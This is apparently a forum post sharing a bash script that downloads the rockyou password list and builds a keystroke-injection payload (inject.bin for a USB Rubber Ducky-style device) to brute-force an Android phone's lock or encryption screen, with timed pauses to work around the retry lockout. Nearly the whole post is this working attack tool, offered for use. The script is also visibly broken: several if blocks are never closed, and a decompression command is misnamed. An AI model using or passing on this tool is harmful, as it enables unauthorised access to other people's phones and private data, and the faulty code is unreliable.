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[Payload] Android Brute Force Password

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Another good thing to do would be to download the rockyou password list
from skullsecurity. Take like the top 5000 out of it as it is already
sorted by most frequently used to least. If a device is encrypted this
will save you tons of time as there is no 5 password then wait limiter.

is a script that will grab rockyou.txt and create a payload for you in
linux. Right now it does wait 30 seconds after every 5 passwords. I'm
adding an option to not wait 30 seconds as if attacking the encryption
logon screen.

echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
     echo "Sorry, you need super user access to run this script."
     exit 1
echo -e "Verifying prerequisites are installed ... "
echo ""
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
echo "Duckencode.jar not found on system. Please verify you have this installed."
exit 1
echo "Duckencode.jar prerequisite met."
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
echo "Bzip2 not found on system. Please verify you have this installed."
exit 1
echo "Bzip2 prerequisite met."
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
echo "Wget not found on system. Please verify you have this installed."
exit 1
echo "Wget prerequisite met."
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
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